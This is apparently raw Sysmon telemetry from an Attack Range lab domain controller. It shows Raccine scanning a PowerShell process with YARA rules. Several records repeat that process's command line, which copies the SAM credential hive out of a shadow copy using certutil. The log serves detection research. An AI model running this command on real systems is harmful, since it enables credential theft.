17:24:12.761{9DBE88B5-3BBC-61B2-7505-010000000E02}41645992C:\Windows\system32\conhost.exe{9DBE88B5-3BBC-61B2-7405-010000000E02}7336C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002164760Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.749{9DBE88B5-3A8E-61AE-DBA7-000000000E02}4492968C:\Windows\system32\csrss.exe{9DBE88B5-3BBC-61B2-7405-010000000E02}7336C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002164759Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.748{9DBE88B5-3BBC-61B2-6805-010000000E02}57644776C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3BBC-61B2-7405-010000000E02}7336C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002164758Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.748{9DBE88B5-3BBC-61B2-7405-010000000E02}7336C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\mal_emotet.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac665.tmp -d Name="powershell.exe" -d ExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d CommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' & {write-host \''\''$shadowlist = get-wmiobject win32_shadowcopy$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]$shadowpath = \''\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\'' + $maxvolume + \''\Windows\System32\config\SAM\''certutil -f -v -encodehex $shadowpath $ENV:temp\myhive 2} 2} " -d TimeSinceExeCreation=1878 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-3BBC-61B2-6805-010000000E02}5764C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {write-host \""\"" $shadowlist = get-wmiobject win32_shadowcopy $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]} $maxvolume = ($volumenumbers | Sort-Object -Descending)[0] $shadowpath = \""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\"" + $maxvolume + \""\Windows\System32\config\SAM\"" certutil -f -v -encodehex $shadowpath $ENV:temp\myhive 2} 10341000x80000000000000002164755Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.732{9DBE88B5-3BBC-61B2-7305-010000000E02}58841172C:\Windows\system32\conhost.exe{9DBE88B5-3BBC-61B2-7205-010000000E02}992C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002164749Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.719{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44926092C:\Windows\system32\csrss.exe{9DBE88B5-3BBC-61B2-7205-010000000E02}992C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002164748Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.719{9DBE88B5-3BBC-61B2-6805-010000000E02}57644776C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3BBC-61B2-7205-010000000E02}992C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002164747Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.719{9DBE88B5-3BBC-61B2-7205-010000000E02}992C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\mal_darkside.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac665.tmp -d Name="powershell.exe" -d ExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d CommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' & {write-host \''\''$shadowlist = get-wmiobject win32_shadowcopy$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]$shadowpath = \''\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\'' + $maxvolume + \''\Windows\System32\config\SAM\''certutil -f -v -encodehex $shadowpath $ENV:temp\myhive 2} 2} " -d TimeSinceExeCreation=1878 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-3BBC-61B2-6805-010000000E02}5764C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {write-host \""\"" $shadowlist = get-wmiobject win32_shadowcopy $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]} $maxvolume = ($volumenumbers | Sort-Object -Descending)[0] $shadowpath = \""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\"" + $maxvolume + \""\Windows\System32\config\SAM\"" certutil -f -v -encodehex $shadowpath $ENV:temp\myhive 2} 10341000x80000000000000002164744Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.701{9DBE88B5-3BBC-61B2-7105-010000000E02}69441272C:\Windows\system32\conhost.exe{9DBE88B5-3BBC-61B2-7005-010000000E02}2116C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002164738Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.690{9DBE88B5-3A8E-61AE-DBA7-000000000E02}4492968C:\Windows\system32\csrss.exe{9DBE88B5-3BBC-61B2-7005-010000000E02}2116C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002164737Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.689{9DBE88B5-3BBC-61B2-6805-010000000E02}57644776C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3BBC-61B2-7005-010000000E02}2116C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002164736Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.690{9DBE88B5-3BBC-61B2-7005-010000000E02}2116C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\gen_ransomware_command_lines.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac665.tmp -d Name="powershell.exe" -d ExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d CommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' & {write-host \''\''$shadowlist = get-wmiobject win32_shadowcopy$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]$shadowpath = \''\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\'' + $maxvolume + \''\Windows\System32\config\SAM\''certutil -f -v -encodehex $shadowpath $ENV:temp\myhive 2} 2} " -d TimeSinceExeCreation=1878 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-3BBC-61B2-6805-010000000E02}5764C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {write-host \""\"" $shadowlist = get-wmiobject win32_shadowcopy $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]} $maxvolume = ($volumenumbers | Sort-Object -Descending)[0] $shadowpath = \""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\"" + $maxvolume + \""\Windows\System32\config\SAM\"" certutil -f -v -encodehex $shadowpath $ENV:temp\myhive 2} 10341000x80000000000000002164733Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.673{9DBE88B5-3BBC-61B2-6F05-010000000E02}51447560C:\Windows\system32\conhost.exe{9DBE88B5-3BBC-61B2-6E05-010000000E02}5520C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002164727Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.661{9DBE88B5-3A8E-61AE-DBA7-000000000E02}4492968C:\Windows\system32\csrss.exe{9DBE88B5-3BBC-61B2-6E05-010000000E02}5520C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002164726Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.661{9DBE88B5-3BBC-61B2-6805-010000000E02}57644776C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3BBC-61B2-6E05-010000000E02}5520C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002164725Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.661{9DBE88B5-3BBC-61B2-6E05-010000000E02}5520C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\gen_raccine_kills.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac665.tmp -d Name="powershell.exe" -d ExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d CommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' & {write-host \''\''$shadowlist = get-wmiobject win32_shadowcopy$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]$shadowpath = \''\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\'' + $maxvolume + \''\Windows\System32\config\SAM\''certutil -f -v -encodehex $shadowpath $ENV:temp\myhive 2} 2} " -d TimeSinceExeCreation=1878 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-3BBC-61B2-6805-010000000E02}5764C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {write-host \""\"" $shadowlist = get-wmiobject win32_shadowcopy $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]} $maxvolume = ($volumenumbers | Sort-Object -Descending)[0] $shadowpath = \""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\"" + $maxvolume + \""\Windows\System32\config\SAM\"" certutil -f -v -encodehex $shadowpath $ENV:temp\myhive 2} 10341000x80000000000000002164722Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.645{9DBE88B5-3BBC-61B2-6D05-010000000E02}46404664C:\Windows\system32\conhost.exe{9DBE88B5-3BBC-61B2-6C05-010000000E02}5552C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002164714Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.630{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44926092C:\Windows\system32\csrss.exe{9DBE88B5-3BBC-61B2-6C05-010000000E02}5552C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002164713Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.630{9DBE88B5-3BBC-61B2-6805-010000000E02}57644776C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3BBC-61B2-6C05-010000000E02}5552C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002164712Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.630{9DBE88B5-3BBC-61B2-6C05-010000000E02}5552C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\gen_powershell_invocation.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac665.tmp -d Name="powershell.exe" -d ExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d CommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' & {write-host \''\''$shadowlist = get-wmiobject win32_shadowcopy$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]$shadowpath = \''\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\'' + $maxvolume + \''\Windows\System32\config\SAM\''certutil -f -v -encodehex $shadowpath $ENV:temp\myhive 2} 2} " -d TimeSinceExeCreation=1878 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-3BBC-61B2-6805-010000000E02}5764C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {write-host \""\"" $shadowlist = get-wmiobject win32_shadowcopy $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]} $maxvolume = ($volumenumbers | Sort-Object -Descending)[0] $shadowpath = \""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\"" + $maxvolume + \""\Windows\System32\config\SAM\"" certutil -f -v -encodehex $shadowpath $ENV:temp\myhive 2} 10341000x80000000000000002164709Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.612{9DBE88B5-3BBC-61B2-6B05-010000000E02}48601924C:\Windows\system32\conhost.exe{9DBE88B5-3BBC-61B2-6A05-010000000E02}7912C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002164672Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.598{9DBE88B5-3A8E-61AE-DBA7-000000000E02}4492968C:\Windows\system32\csrss.exe{9DBE88B5-3BBC-61B2-6A05-010000000E02}7912C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002164671Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.598{9DBE88B5-3BBC-61B2-6805-010000000E02}57644776C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3BBC-61B2-6A05-010000000E02}7912C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002164670Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.598{9DBE88B5-3BBC-61B2-6A05-010000000E02}7912C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\ext-vars-test.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac665.tmp -d Name="powershell.exe" -d ExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d CommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' & {write-host \''\''$shadowlist = get-wmiobject win32_shadowcopy$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]$shadowpath = \''\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\'' + $maxvolume + \''\Windows\System32\config\SAM\''certutil -f -v -encodehex $shadowpath $ENV:temp\myhive 2} 2} " -d TimeSinceExeCreation=1878 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-3BBC-61B2-6805-010000000E02}5764C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {write-host \""\"" $shadowlist = get-wmiobject win32_shadowcopy $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]} $maxvolume = ($volumenumbers | Sort-Object -Descending)[0] $shadowpath = \""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\"" + $maxvolume + \""\Windows\System32\config\SAM\"" certutil -f -v -encodehex $shadowpath $ENV:temp\myhive 2} 10341000x80000000000000002164668Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.594{9DBE88B5-3BA0-61B2-4205-010000000E02}39207816C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-3BBC-61B2-6805-010000000E02}5764C:\Program Files\Raccine\Raccine.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002164653Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.586{9DBE88B5-3BA0-61B2-4205-010000000E02}39207816C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002164585Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.542{9DBE88B5-C32E-61A8-0C00-000000000E02}8485240C:\Windows\system32\svchost.exe{9DBE88B5-3BBC-61B2-6805-010000000E02}5764C:\Program 